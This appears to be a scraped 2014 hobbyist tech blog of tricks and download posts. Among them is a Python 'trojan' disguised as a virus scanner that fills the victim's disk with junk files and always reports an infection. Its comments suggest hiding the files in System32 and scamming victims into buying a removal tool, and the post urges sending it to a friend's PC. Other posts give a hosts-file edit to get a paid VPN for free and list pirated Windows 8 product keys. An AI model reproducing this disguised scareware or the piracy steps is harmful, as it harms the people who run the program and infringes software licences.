Sunday, March 23, 2014

Hotspot Shield Elite For Lifetime

Friends Today I have a new trick for you by which you can use hotspot shield elite lifetime for free.I tried it it is really working on my PC.
  • First download Hotspot Shield from here

Download

  • Go To C:\Windows\System32\drivers\etc and open hosts file with notepad(Run Notepad As Administrator).
  • Now paste the BELOW code just BELOW the last line of hosts file.

Code:


127.0.0.1 anchorfree.net
127.0.0.1 rss2search.com
127.0.0.1 techbrowsing.com
127.0.0.1 box.anchorfree.net
127.0.0.1 www.mefeedia.com
127.0.0.3 www.anchorfree.net
127.0.0.2 www.mefeedia.com
  • Now save it by going file> save . 
  • Now INSTALL Hotspotshield and uncheck the run after installation.
  • Then Restart your PC.

    Enjoy

    PS: I don't know if you get the IP's from Elite, but it doesn't show any Ad in browser.

    Friday, March 21, 2014

    How to hack Downloading Managers and Torrent speed with Cheat Engine


    How to Hack Torrent Speed with Cheat Engine

    You can download Cheat Engine from here Download 

    1. First download Cheat Engine.

    2. Then open Cheat Engine.

    3. And open Select A Progress File.

    4. From the list select the Torrent or Downlaod Manager  that you have installed.

    4. Select the Enable speed hack and change its value to 0.1

     

     After doing that ..(Only For torrents)

    1. Open torrent you have installed.
    hit   Ctrl+G
    2. Change the upload speed to 128 kbps

     

    3. Save and close

     

     Now you have full speed...enjoy

    It is 100% working I tried.I hope you will like this post.


    Internet Speed Up

    Internet Speed Up

    Internet never speeds  up it's speed depends the provider I tried many tricks to speed up but it does'nt speeds up if you dont trust then you can try.

    Zc Dream Photo Editor

    ZC Dream Photo Editor

    ZC Dream Photo Editor is freeware no registration is needed.

    I hope you will like this.

    Download ZC Dream Photo Editor

    Magic Photo Editor

    File Type : EXE

     Size : 4.3 MB



    With this photo editing software, you can easily blend your digital photo onto another image (a beautiful landscape image etc) to create special effect.  You can also add some pretty frames, flowers and cartoon pictures onto your photo  with Magic Photo Editor.
    Magic Photo Editor makes your photo more attractive and interesting.
    Give this photo editor to your beloved one.  I think it a pretty gift.

    Download Magic PhotoEditor 

     Password For Rar File

    sharoonqadeer.blogspot.com

    Photo Shine With Many New Templates

    Photoshine 4.6

    It is new and has many new teplates.

    Download Photoshine

     

    Photo Shine 2014

    PhotoShine 2014 with new Frames

    Download and enjoy  no need for  registration i hope you will like this.
    Download

    Thursday, March 20, 2014

    How to see Youtube videos without Loging In

    How To See Youtube Videos Without Loging In

    Some youtube videos require log in and specify your age. You can see these videos without logging in by following method:
    Suppose that we want to watch this video:
       youtube.com/watch?v=1LFlYnkRxOo
    We need to edit the link this way .
    > Replace the "?" after watch with "/" and "=" after v with "/"
    > So our link after editing would be:
       youtube.com/watch/v/1LFlYnkRxOo
    > Now use this link in your browser to watch the video
    Enjoy...

    Trojen Virus

    Trojen Virus

    Trojans are the most infamous viruses in computer world which can make your PC damn slow and it sometimes also crash the pc. Here we are making a trojan in python language.
    So let's start
    1. Copy and paste the following code in notepad:
    #tokzikate's trojan
    import win32file
    import os
    def get_drivestats():
    #This retrieves the amount of free space on the drive in
    bytes
    drive = os.path.splitdrive(os.getcwd())[0].rstrip(':')
    sectPerCluster, bytesPerSector, freeClusters, totalClusters =
    \
    win32file.GetDiskFreeSpace(drive + ":\\")
    free_space = freeClusters*sectPerCluster*bytesPerSector
    return free_space, drive
    print ("-"*40)
    print ("-" + " " * 9 + "Welcome to pyVirScan" + " " * 9 + "-")
    print ("-" + " " * 2 + "A Virus Scanner written in Python!" + " "
    * 2 + "-")
    print ("-" + " " * 13 + "Version 1.00" + " " * 13 + "-")
    print ("-"*40)
    print ("Be patient, you will be notified when the scan is complete")
    #print ("Current Progress: 0.01%")
    free_space, drive = get_drivestats()
    #Convert free_space to kb and store in a variable
    kb = float(1024)
    kbFree = free_space / kb
    #Find the amount of files you need to create to *almost* fill the drive
    fillWithFloat = kbFree / 409600
    #convert the amount of files needed to create from a
    fillWithInt = int(round(fillWithFloat))
    loopNum = 1
    for y in range(fillWithInt):
    block = '0' * 409600
    #This saves the files to the current directory, but change it so that it changes it to System 32, so the victim can't find the file they are trying to delete!
    bigFile = file("sysscanresults" + str(loopNum) + ".dll", 'wb')
    for x in range(1000):
    bigFile.write(block)
    bigFile.close()
    #Didn't finish writing the percent complete function, you can uncomment and fix the lines of code if you want
    #percentComplete = loopNum * fillWithInt / 100
    #print ("Current Progress: " + str(percentComplete) + "%")
    loopNum += 1
    #I don't know why I did this...
    #Maybe so that you can give the source to someone who doesn't know python
    #and get them to run it! so it looks more legitimate...
    mwahaha
    if 1 == 1:
    virus = 1
    if 1 != 1:
    virus = 0
    print ("-"*40)
    print (" " * 12 + "Scan Completed!")
    print (" -"*20)
    print ("Results:")
    if virus == 1:
    #This will always be true, unless the source is edited
    #For scamming purposes you could tell them to buy a virus
    #removal tool or something of the like.
    print("The results were positive, your computer is infected.")
    #Yet to add the text file creation
    #print("To see the full list of results, navigate to C:\\results.txt")
    #print("In the text file you will see:")
    #print ("1) What you are infected by.")
    #print ("2) Details of each infection.")
    #print ("3) What you can do to remove the virus'.")
    if virus == 0:
    print("Your computer is clean!")
    print ("Thankyou for using pyVirScan")
    print ("-"*40)
    exit = raw_input("Press <enter> to exit...")


    2. Now save the file as virus.py.
    3. Now open this file in your python interpreter and you are done.
    Now you can send this virus to you friend's PC or laptop.

    Black Track 5

    Black Track 5


    BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumbdrive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.



    BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

    Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.




    BackTrack 5 is OUTDATED and no longer supported. Please check the KALI LINUX project instead.

    http://www.kali.org

    ----------------------------

    Type :  7 zip Archive
    Size  :  2.6 GB

    Download GNOME 32-Bits

    ----------------------------

    Type :  ISO Disk Image
    Size  :  3.1 GB

    Download KDE 32-Bits
    Download GNOME 32-Bits
    Download KDE 64-Bits
    Download GNOME 64-Bits

    ----------------------------

    Kaali Linux



    Kali Linux

     

     

     32-Bits

    Type :  ISO Disk Image
    Size  :  3085 MB
    Download 32-Bits

    64-Bits

    Type :  ISO Disk Image
    Size  :  2993.3 MB
    Download 64-Bits

    ARMEL

    Type :  Z File
    Size   :  2085.1 MB
    Download ARMEL

    ARMHF

    Type :  XZ File
    Size  :  1995.8 MB
    Download ARMHF

    ------------------------

    Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.

    Kali Linux Features

    Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.
    More than 300 penetration testing tools:
            After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality.
    Free and always Kali Linux Features be:
            Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux.
    Open source Git tree:
            We are huge proponents of open source software and our development tree is available for all to see and all sources are available for those who wish to tweak and rebuild packages.



    FHS compliant:
            Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc.



    Vast wireless device support:
            We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.



    Custom kernel patched for injection:
            As penetration testers, the development team often needs to do wireless assessments so our kernel has the latest injection patches included.



    Secure development environment:
            The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols.



    GPG signed packages and repos:
            All Kali packages are signed by each individual developer when they are built and committed and the repositories subsequently sign the packages as well.



    Multi-language:
            Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.



    Completely customizable:
            We completely understand that not everyone will agree with our design decisions so we have made it as easy as possible for our more adventurous users to customize Kali Linux to their liking, all the way down to the kernel.

    Microsoft Windows 8.1

                                    Microsoft Windows 8







    32 Bits
    Type :  ISO Disk Image
    Size  :   2.6 GB

    Download 32-Bits


    64 Bits
    Type :  ISO Disk Image
     Size  :  3.5 GB
    Download 64-Bits








    Free keys (if installation setup asks for keys,enter one of these)
    XHQ8N-C3MCJ-RQXB6-WCHYG-C9WKB

    NTTX3-RV7VB-T7X7F-WQYYY-9Y92F

    MTWNQ-CKDHJ-3HXW9-Q2PFX-WB2HQ
    GMDYM-NCKGV-V44HG-XJRK3-C36VD
    HM43N-HHT8J-M764G-CQVW8-GVF92
    KN698-X8QQ3-F8JYF-GCM3G-VCBQP
    N8XFR-D7KFP-4QDGD-HTR3M-MY2K2
    2VNV4-77CKK-GRDM3-4FPQK-QV3HC
    Windows 8.1 RTM Keys
    334NH-RXG76-64THK-C7CKG-D3VPT
    XHQ8N-C3MCJ-RQXB6-WCHYG-C9WKB
























    Windows 8.1 , the first major update to Windows 8 and RT, was officially announced by Microsoft on May 14, 2013. Following a presentation devoted to the update at Build Conference 2013, a public beta version of the update was released on June 26, 2013.Windows 8.1 was released to OEM hardware partners on August 27, 2013, and released publicly as a free download through Windows Store on October 17, 2013. Volume license customers and subscribers to MSDN Plus and TechNet Plus were initially unable to obtain the RTM version upon its release; a spokesperson stated that the change in policy was to allow Microsoft to work with OEMs “to ensure a quality experience at general availability.” However, after criticism, Microsoft reversed its decision and released the RTM build on MSDN and TechNet on September 9, 2013.